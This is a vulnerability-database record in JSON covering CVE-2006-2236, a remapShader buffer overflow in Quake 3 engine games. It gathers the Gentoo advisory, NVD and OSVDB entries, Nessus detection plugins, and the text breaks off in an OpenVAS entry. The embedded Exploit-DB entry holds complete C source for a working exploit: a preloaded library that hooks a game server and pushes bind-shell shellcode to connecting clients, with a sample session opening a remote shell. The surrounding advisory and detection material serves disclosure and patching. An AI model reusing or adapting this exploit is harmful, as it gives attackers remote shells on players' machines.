ID GLSA-200605-12 Type gentoo Reporter Gentoo Foundation Modified 2006-05-10T00:00:00
Description
Background
Quake 3 is a multiplayer first person shooter.
Description
landser discovered a vulnerability within the "remapShader" command. Due to a boundary handling error in "remapShader", there is a possibility of a buffer overflow.
Impact
An attacker could set up a malicious game server and entice users to connect to it, potentially resulting in the execution of arbitrary code with the rights of the game user.
Workaround
Do not connect to untrusted game servers.
Resolution
All Quake 3 users should upgrade to the latest version:
{"published": "2006-05-10T00:00:00", "id": "GLSA-200605-12", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "history": [], "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "hash": "85c748b6f19b9ad03a85314205939f040a6a81085566c2d67bb5c0233be71590", "description": "### Background\n\nQuake 3 is a multiplayer first person shooter. \n\n### Description\n\nlandser discovered a vulnerability within the \"remapShader\" command. Due to a boundary handling error in \"remapShader\", there is a possibility of a buffer overflow. \n\n### Impact\n\nAn attacker could set up a malicious game server and entice users to connect to it, potentially resulting in the execution of arbitrary code with the rights of the game user. \n\n### Workaround\n\nDo not connect to untrusted game servers. \n\n### Resolution\n\nAll Quake 3 users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=games-fps/quake3-bin-1.32c\"\n\nAll RTCW users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=games-fps/rtcw-1.41b\"\n\nAll Enemy Territory users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=games-fps/enemy-territory-2.60b\"", "type": "gentoo", "lastseen": "2016-09-06T19:46:06", "edition": 1, "title": "Quake 3 engine based games: Buffer Overflow", "href": "https://security.gentoo.org/glsa/200605-12", "modified": "2006-05-10T00:00:00", "bulletinFamily": "unix", "viewCount": 0, "cvelist": ["CVE-2006-2236"], "affectedPackage": [{"packageVersion": "1.32c", "packageName": "games-fps/quake3-bin", "packageFilename": "UNKNOWN", "operator": "lt", "OSVersion": "any", "OS": "Gentoo", "arch": "all"}, {"packageVersion": "1.41b", "packageName": "games-fps/rtcw", "packageFilename": "UNKNOWN", "operator": "lt", "OSVersion": "any", "OS": "Gentoo", "arch": "all"}, {"packageVersion": "2.60b", "packageName": "games-fps/enemy-territory", "packageFilename": "UNKNOWN", "operator": "lt", "OSVersion": "any", "OS": "Gentoo", "arch": "all"}], "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2236", "https://bugs.gentoo.org/show_bug.cgi?id=132377"], "reporter": "Gentoo Foundation", "hashmap": [{"hash": "0b202e895b5f3c37ff114232640d6389", "key": "affectedPackage"}, {"hash": "4913a9178621eadcdf191db17915fbcb", "key": "bulletinFamily"}, {"hash": "cce76a3776e9162bbe0fe73c29620748", "key": "cvelist"}, {"hash": "774fce555a963c00be305187dd6dff95", "key": "cvss"}, {"hash": "b41724254624ef762724e4e97d16f4be", "key": "description"}, {"hash": "76c86669e4861b7fe126c6f8fef9cc33", "key": "href"}, {"hash": "99aaa11ed6290477825af20f207e3d0a", "key": "modified"}, {"hash": "777d45bbbcdf50d49c42c70ad7acf5fe", "key": "objectVersion"}, {"hash": "99aaa11ed6290477825af20f207e3d0a", "key": "published"}, {"hash": "62327a5ce402a593fea0cc3f64a21cd2", "key": "references"}, {"hash": "ac1fd6b3deacaf22b54dd1934ae33181", "key": "reporter"}, {"hash": "461b3dc3d2b250ccc63c90007fe775b8", "key": "title"}, {"hash": "365d0fc7d6206ff26e2f2c2a78c91a94", "key": "type"}], "objectVersion": "1.2"}
{"cve": [{"lastseen": "2018-10-19T11:35:58", "references": ["http://www.securityfocus.com/archive/1/433349/100/0/threaded", "http://www.securityfocus.com/bid/17857", "http://www.vupen.com/english/advisories/2006/1676", "http://www.gentoo.org/security/en/glsa/glsa-200605-12.xml", "https://www.exploit-db.com/exploits/1750", "https://exchange.xforce.ibmcloud.com/vulnerabilities/26264"], "description": "Buffer overflow in the Quake 3 Engine, as used by (1) ET 2.60, (2) Return to Castle Wolfenstein 1.41, and (3) Quake III Arena 1.32b allows remote attackers to execute arbitrary commands via a long remapShader command.", "edition": 4, "reporter": "NVD", "published": "2006-05-08T19:02:00", "title": "CVE-2006-2236", "type": "cve", "enchantments": {"score": {"modified": "2018-10-19T11:35:58", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2006-2236"], "scanner": [], "modified": "2018-10-18T12:38:48", "cpe": ["cpe:/a:id_software:wolfenstein_enemy_territory:2.60", "cpe:/a:id_software:quake_3_arena:1.32b", "cpe:/a:id_software:return_to_castle_wolfenstein:1.41", "cpe:/a:id_software:quake_3_engine:1.32b"], "id": "CVE-2006-2236", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2236", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-01-31T14:48:40", "osvdbidlist": ["25279"], "references": [], "description": "Quake 3 Engine 1.32b R_RemapShader() Remote Client BoF Exploit. CVE-2006-2236. Remote exploit for linux platform", "edition": 1, "reporter": "landser", "published": "2006-05-05T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "exploitdb", "title": "Quake 3 Engine 1.32b R_RemapShader Remote Client BoF Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-2236"], "modified": "2006-05-05T00:00:00", "id": "EDB-ID:1750", "href": "https://www.exploit-db.com/exploits/1750/", "sourceData": "// remap_this.c - \"R_RemapShader()\" q3 engine 1.32b client remote bof exploit\n// by landser - landser at hotmail.co.il\n//\n// this code works as a preloaded shared library on a game server,\n// it hooks two functions on the running server:\n// svc_directconnect() that is called when a client connects,\n// and sv_sendservercommand() which we use to send malformed \"remapShader\" commands to clients.\n// vuln clients connecting to the server will bind a shell on a chosen port (#define PORT) and exit cleanly with an unsuspicious error message.\n//\n// vuln: latest linux clients of ET, rtcw, and q3 on boxes with +x stack (independent of distro)\n// (win32 clients are vuln too but not included here)\n//\n// usage:\n// gcc remap_this.c -shared -fPIC -o remap_this.so\n// and run a server with env LD_PRELOAD=\"./remap_this.so\"\n//\n// -----------------------------------------------------\n// [luser@box ~/wolfenstein]$ LD_PRELOAD=\"./remap_this.so\" ./wolfded.x86 +set net_port 5678 +map mp_beach\n// remap_this.c by landser - landser at hotmail.co.il\n//\n// game: RtCW 1.41 Dedicated.\n// [...]\n// directconnect(): 10.0.0.4 connected\n// sendservercommand() called\n// sendservercommand() called\n// sendservercommand() called\n// [...]\n// [luser@box ~/wolfenstein]$ nc 10.0.0.4 27670 -vv\n// sus4 [10.0.0.4] 27670 (?) open\n// id\n// uid=1000(luser) gid=100(lusers)\n// -----------------------------------------------------\n//\n// visit www.nixcoders.org for open source linux cheats\n\n#define _GNU_SOURCE\n#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <string.h>\n#include <dlfcn.h>\n#include <sys/mman.h>\n\n#define SILENT // hide the crappy server output\n#define PORT 27670 // bindshell port. some values are invalid\n\nstruct netaddr { // from q3-1.32b/qcommon/qcommon.h\n\tint type;\n\tunsigned char ip[4];\n\tunsigned char ipx[10];\n\tunsigned short port;\n};\n\nstruct {\n\tchar *name;\n\tchar *fn;\n\tunsigned long retaddr;\t// something that jumps to %esp\n\tunsigned long sendservercommand; // address of sv_sendservercommand()\n\tunsigned long directconnect; // address of svc_directconnect()\n\tint hooklen; // for both sendservercommand and directconnect\n\tunsigned long errormsg; // address of error string\n\tunsigned long comerror; // address of com_error()\n\tint popas; // num of popa instructions before shellcode\n\tint gap; // gap between %esp to %eip when prog gets to the last shellcode instruction\n} games[] = {\n\t{\"ET 2.60 Dedicated\",\t\t\"etded\",\n\t\t0x081b4133, 0x08056c10, 0x0804e880, 6, 0x081a6a65, 0x0806a1a0, 14, 12},\n\t{\"RtCW 1.41 Dedicated\",\t\t\"wolfded\",\n\t\t0x080c4356, 0x0805ee94, 0x08058740, 9, 0x08187772, 0x080a87e8, 14, 12},\n\t{\"Quake 3 1.32b Dedicated\",\t\"q3ded\",\n\t\t0x080a200b, 0x0805fa68, 0x08059884, 9, 0x08167635, 0x08094688, 11, 27},\n};\n\nconst int ngames = sizeof(games) / sizeof(games[0]);\nconst unsigned short int port = PORT;\n\nstatic void *hook (void *, int, void *);\nstatic void sendservercommand (void *, const char *, ...);\nstatic void directconnect (struct netaddr);\nstatic void writebuf (void);\n\nvoid (*_sendservercommand)(void *, const char *, ...);\nvoid (*_directconnect)(struct netaddr);\n\nint c = -1;\nunsigned char buf[1024];\n\n// shellcode (286 bytes):\n// fork()s,\n// the parent proc calls com_error() with an error message (errormsg var),\n// the child proc binds a shell on a chosen port\n// unallowed chars: 0x00, 0x22, 0x2e, 0x5c, >=0x80\nunsigned char sc[] =\n\t\"\\x68\\x03\\x5a\\x70\\x50\\x58\\x05\\x01\\x01\\x7b\\x71\\x50\\x68\\x57\\x50\\x7f\\x69\"\n\t\"\\x58\\x05\\x01\\x7d\\x01\\x01\\x50\\x68\\x70\\x30\\x6a\\x06\\x58\\x66\\x05\\x7b\\x76\"\n\t\"\\x50\\x68\\x54\\x5b\\x52\\x53\\x68\\x2f\\x62\\x69\\x6e\\x68\\x2f\\x73\\x68\\x68\\x68\"\n\t\"\\x0b\\x58\\x68\\x2f\\x68\\x48\\x78\\x79\\x69\\x58\\x05\\x01\\x01\\x7f\\x01\\x50\\x68\"\n\t\"\\x3e\\x57\\x50\\x01\\x58\\x05\\x01\\x01\\x7d\\x7f\\x50\\x68\\x75\\x1c\\x59\\x6a\\x68\"\n\t\"\\x50\\x01\\x48\\x40\\x58\\x66\\x05\\x7d\\x7f\\x50\\x68\\x5b\\x6a\\x02\\x58\\x68\\x7f\"\n\t\"\\x50\\x53\\x58\\x58\\x66\\x40\\x50\\x68\\x69\\x65\\x57\\x50\\x58\\x05\\x01\\x01\\x01\"\n\t\"\\x7d\\x50\\x68\\x57\\x54\\x59\\x43\\x68\\x7f\\x5f\\x50\\x50\\x58\\x66\\x40\\x50\\x68\"\n\t\"\\x69\\x65\\x57\\x50\\x58\\x05\\x01\\x01\\x01\\x7d\\x50\\x68\\x7f\\x6a\\x04\\x5b\\x58\"\n\t\"\\x66\\x40\\x50\\x68\\x69\\x65\\x57\\x50\\x58\\x05\\x01\\x01\\x01\\x7d\\x50\\x68\\x51\"\n\t\"\\x50\\x54\\x59\\x68\\x45\\x55\\x6a\\x10\\x68\\x5b\\x0e\\x50\\x44\\x58\\x05\\x02\\x01\"\n\t\"\\x7d\\x01\\x50\" \"PORT\" \"\\x66\\x68\\x5b\\x5d\\x52\\x66\\x68\\x53\\x58\\x50\\x01\"\n\t\"\\x58\\x05\\x01\\x01\\x7d\\x7f\\x50\\x68\\x52\\x53\\x6a\\x02\\x68\\x4a\\x6a\\x01\\x5b\"\n\t\"\\x68\\x58\\x6a\\x01\\x5a\\x68\\x07\\x50\\x6a\\x66\\x58\\x66\\x05\\x01\\x73\\x50\\x68\"\n\t\"\\x67\" \"CM1\" \"\\x58\\x05\\x01\" \"CM2\" \"\\x50\\x68\\x6a\\x02\\x6a\\x01\\x68\" \"ERRM\"\n\t\"\\x68\\x40\\x74\\x0f\\x68\\x68\\x57\\x50\\x7f\\x47\\x58\\x05\\x01\\x7d\\x01\\x01\\x50\"\n\t\"\\x68\\x41\\x41\\x6a\\x02\\x74\\x0c\\x75\\x0a\";\n\nvoid __attribute__ ((constructor)) init (void) {\n\tchar buf[256];\n\tint ret;\n\t\n\tprintf(\"remap_this.c by landser - landser at hotmail.co.il\\n\\n\");\n\n\tret = readlink(\"/proc/self/exe\", buf, sizeof buf);\n\tif (ret < 0) {\n\t\tperror(\"readlink()\");\n\t\texit(EXIT_FAILURE);\n\t}\n\tbuf[ret] = '\\0';\n\n\tfor (c=0;c<ngames;c++)\n\t\tif (strstr(buf, games[c].fn)) break;\n\t\n\tif (c == ngames) {\n\t\tprintf(\"binary doesnt match any of the targets.\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\t\n\tprintf(\"game: %s.\\n\\n\", games[c].name);\n\n\twritebuf();\n\n\t_sendservercommand = hook((void *)games[c].sendservercommand, games[c].hooklen, &sendservercommand);\n\t_directconnect = hook((void *)games[c].directconnect, games[c].hooklen, &directconnect);\n}\n\nint fputs (const char *s, FILE *fp) {\n\tstatic int (*_fputs)(const char *, void *);\n\tif (!_fputs) _fputs = dlsym(RTLD_NEXT, \"fputs\");\n\n#ifdef SILENT\n\tif (strncmp(s, \"---\", 3)) return 1;\n#endif\n\n\treturn _fputs(s, fp);\n}\n\nstatic void sendservercommand (void *client, const char *fmt, ...) {\n\tprintf(\"sendservercommand() called\\n\");\n\t_sendservercommand(client, \"%s\", buf);\n}\n\nstatic void directconnect (struct netaddr addr) {\n\tprintf(\"directconnect(): %d.%d.%d.%d connected\\n\",\n\t\taddr.ip[0], addr.ip[1], addr.ip[2], addr.ip[3]);\n\t_directconnect(addr);\n}\n\nstatic void writebuf (void) {\n\tunsigned char *cm1, *cm2, *ptr = buf;\n\tint i, b;\n\n\tstrcpy(ptr, \"remapShader \");\n\tif (strstr(games[c].name, \"Quake\")) strcat(ptr, \"j w \");\n\tstrcat(ptr, \"\\\"\");\n\tptr += strlen(ptr);\n\n\tmemset(ptr, '\\b', 76);\n\tptr += 76;\n\n\tmemcpy(ptr, &games[c].retaddr, 4);\n\tptr += 4;\n\n\tif (strstr(games[c].name, \"Quake\")) {\n\t\t// replaces %ebp with %esp without using the stack\n\t\tmemcpy(ptr, \"\\x33\\x2f\\x31\\x2f\\x31\\x27\\x33\\x27\\x31\\x27\", 10);\n\t\tptr += 10;\n\t}\n\n\tmemset(ptr, 0x61, games[c].popas); // 'popa' instructions\n\tptr += games[c].popas;\n\n\tmemcpy(ptr, sc, sizeof(sc));\n\t\n\tmemset(ptr + strlen(ptr) - 3, games[c].gap, 1);\n\tmemset(ptr + strlen(ptr) - 1, games[c].gap - 2, 1);\n\n\tcm1 = strstr(ptr, \"CM1\");\n\tcm2 = strstr(ptr, \"CM2\");\n\tif (!cm1 || !cm2) abort();\n\t\n\tfor (i=0;i<3;i++) {\n\t\tb = (games[c].comerror >> (8*i)) & 0xff;\n\t\t\n\t\tif ((b-1) >= 0x7f) {\n\t\t\tcm1[i] = 0x6b;\n\t\t\tcm2[i] = b - 0x6b;\n\t\t}\n\t\telse {\n\t\t\tcm1[i] = b - 1;\n\t\t\tcm2[i] = 1;\n\t\t}\n\t}\n\n\tptr = strstr(ptr, \"PORT\");\n\tif (!ptr) abort();\n\tmemcpy(ptr, \"\\x68\\x68\", 2); // 68 - pushl imm32\n\tmemcpy(ptr+2, &port, sizeof port);\n\t\n\tptr = strstr(ptr, \"ERRM\");\n\tif (!ptr) abort();\n\tmemcpy(ptr, &games[c].errormsg, 4);\n\n\tstrcat(ptr, \"\\\"\");\n\tif (!strstr(games[c].name, \"Quake\")) strcat(ptr, \" j w\");\n}\n\n#define PAGE(x) (void *)((unsigned long)x & 0xfffff000)\n\nstatic void *hook (void *hfunc, int len, void *wfunc) {\n void *newmem = malloc(len+5);\n\tlong rel32;\n\n\t// copy 'len' bytes of instruction from 'hfunc' to 'newmem' and a 'jmp *hfunc' instruction after it\n memcpy(newmem, hfunc, len);\n\tmemset(newmem+len, 0xe9, 1); // e9 - jmp rel32\n\trel32 = hfunc - (newmem+5);\n\tmemcpy(newmem+len+1, &rel32, sizeof rel32);\n\n\t// make 'hfunc's address writable & executable\n\tmprotect(PAGE(hfunc), 4096, PROT_READ|PROT_WRITE|PROT_EXEC);\n \n\t// change the start of 'hfunc' to a 'jmp *wfunc' instruction\n\tmemset(hfunc, 0xe9, 1); // e9 - jmp rel32\n rel32 = wfunc - (hfunc+5);\n\tmemcpy(hfunc+1, &rel32, sizeof rel32);\n\n return newmem;\n}\n\n// milw0rm.com [2006-05-05]\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/1750/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:22", "references": [], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in the Quake 3 Engine. The Quake 3 Engine fails to perform proper bounds checking of the 'remapShader' command resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.\n## Technical Description\nAn attacker must trick the victim to connect to a malicious game server in order to exploit this vulnerability.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nA remote overflow exists in the Quake 3 Engine. The Quake 3 Engine fails to perform proper bounds checking of the 'remapShader' command resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.\n## References:\nVendor URL: http://www.idsoftware.com/\n[Vendor Specific Advisory URL](http://www.gentoo.org/security/en/glsa/glsa-200605-12.xml)\n[Secunia Advisory ID:19984](https://secuniaresearch.flexerasoftware.com/advisories/19984/)\n[Secunia Advisory ID:20065](https://secuniaresearch.flexerasoftware.com/advisories/20065/)\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-05/0222.html\nISS X-Force ID: 26264\nGeneric Exploit URL: http://www.milw0rm.com/exploits/1750\nFrSIRT Advisory: ADV-2006-1676\n[CVE-2006-2236](https://vulners.com/cve/CVE-2006-2236)\nBugtraq ID: 17857\n", "reporter": "landser(landser@hotmail.co.il)", "published": "2006-05-05T06:47:36", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Quake 3 Engine remapShader Command Overflow", "type": "osvdb", "bulletinFamily": "software", "affectedSoftware": [{"name": "ET", "version": "2.60", "operator": "eq"}, {"name": "Return to Castle Wolfenstein", "version": "1.41", "operator": "eq"}, {"name": "Quake III Arena", "version": "1.32b", "operator": "eq"}], "cvelist": ["CVE-2006-2236"], "modified": "2006-05-05T06:47:36", "href": "https://vulners.com/osvdb/OSVDB:25279", "id": "OSVDB:25279", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2018-09-01T23:44:28", "references": ["https://security.gentoo.org/glsa/200605-12"], "pluginID": "21354", "description": "The remote host is affected by the vulnerability described in GLSA-200605-12 (Quake 3 engine based games: Buffer Overflow)\n\n landser discovered a vulnerability within the 'remapShader' command. Due to a boundary handling error in 'remapShader', there is a possibility of a buffer overflow.\n Impact :\n\n An attacker could set up a malicious game server and entice users to connect to it, potentially resulting in the execution of arbitrary code with the rights of the game user.\n Workaround :\n\n Do not connect to untrusted game servers.", "edition": 5, "reporter": "Tenable", "published": "2006-05-13T00:00:00", "title": "GLSA-200605-12 : Quake 3 engine based games: Buffer Overflow", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Gentoo Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-2236"], "modified": "2018-07-11T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:enemy-territory", "p-cpe:/a:gentoo:linux:quake3-bin", "p-cpe:/a:gentoo:linux:rtcw"], "id": "GENTOO_GLSA-200605-12.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=21354", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200605-12.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21354);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/07/11 17:09:25\");\n\n script_cve_id(\"CVE-2006-2236\");\n script_bugtraq_id(17857);\n script_xref(name:\"GLSA\", value:\"200605-12\");\n\n script_name(english:\"GLSA-200605-12 : Quake 3 engine based games: Buffer Overflow\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200605-12\n(Quake 3 engine based games: Buffer Overflow)\n\n landser discovered a vulnerability within the 'remapShader'\n command. Due to a boundary handling error in 'remapShader', there is a\n possibility of a buffer overflow.\n \nImpact :\n\n An attacker could set up a malicious game server and entice users\n to connect to it, potentially resulting in the execution of arbitrary\n code with the rights of the game user.\n \nWorkaround :\n\n Do not connect to untrusted game servers.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200605-12\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Quake 3 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=games-fps/quake3-bin-1.32c'\n All RTCW users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=games-fps/rtcw-1.41b'\n All Enemy Territory users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=games-fps/enemy-territory-2.60b'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:enemy-territory\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:quake3-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:rtcw\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/05/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/05/13\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/05/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"games-fps/quake3-bin\", unaffected:make_list(\"ge 1.32c\"), vulnerable:make_list(\"lt 1.32c\"))) flag++;\nif (qpkg_check(package:\"games-fps/enemy-territory\", unaffected:make_list(\"ge 2.60b\"), vulnerable:make_list(\"lt 2.60b\"))) flag++;\nif (qpkg_check(package:\"games-fps/rtcw\", unaffected:make_list(\"ge 1.41b\"), vulnerable:make_list(\"lt 1.41b\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Quake 3 engine based games\");\n}\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:55:22", "references": ["https://www.gentoo.org/security/en/glsa/glsa-200605-12.xml", "https://security.gentoo.org/glsa/200901-06"], "pluginID": "35350", "description": "The remote host is affected by the vulnerability described in GLSA-200901-06 (Tremulous: User-assisted execution of arbitrary code)\n\n It has been reported that Tremulous includes a vulnerable version of the ioQuake3 engine (GLSA 200605-12, CVE-2006-2236).\n Impact :\n\n A remote attacker could entice a user to connect to a malicious games server, possibly resulting in the execution of arbitrary code with the privileges of the user running the application.\n Workaround :\n\n There is no known workaround at this time.", "edition": 7, "reporter": "Tenable", "published": "2009-01-12T00:00:00", "title": "GLSA-200901-06 : Tremulous: User-assisted execution of arbitrary code", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Gentoo Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-2236"], "modified": "2018-08-10T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:tremulous", "cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:tremulous-bin"], "id": "GENTOO_GLSA-200901-06.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=35350", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200901-06.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(35350);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/08/10 18:07:07\");\n\n script_cve_id(\"CVE-2006-2236\");\n script_xref(name:\"GLSA\", value:\"200901-06\");\n\n script_name(english:\"GLSA-200901-06 : Tremulous: User-assisted execution of arbitrary code\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200901-06\n(Tremulous: User-assisted execution of arbitrary code)\n\n It has been reported that Tremulous includes a vulnerable version of\n the ioQuake3 engine (GLSA 200605-12, CVE-2006-2236).\n \nImpact :\n\n A remote attacker could entice a user to connect to a malicious games\n server, possibly resulting in the execution of arbitrary code with the\n privileges of the user running the application.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.gentoo.org/security/en/glsa/glsa-200605-12.xml\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200901-06\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Tremulous users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=games-fps/tremulous-1.1.0-r2'\n Note: The binary version of Tremulous has been removed from the Portage\n tree.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:tremulous\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:tremulous-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/01/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/01/12\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/05/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"games-fps/tremulous\", unaffected:make_list(\"ge 1.1.0-r2\"), vulnerable:make_list(\"lt 1.1.0-r2\"))) flag++;\nif (qpkg_check(package:\"games-fps/tremulous-bin\", unaffected:make_list(), vulnerable:make_list(\"lt 1.1.0\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Tremulous\");\n}\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-07-24T12:49:59", "references": [], "pluginID": "56727", "description": "The remote host is missing updates announced in\nadvisory GLSA 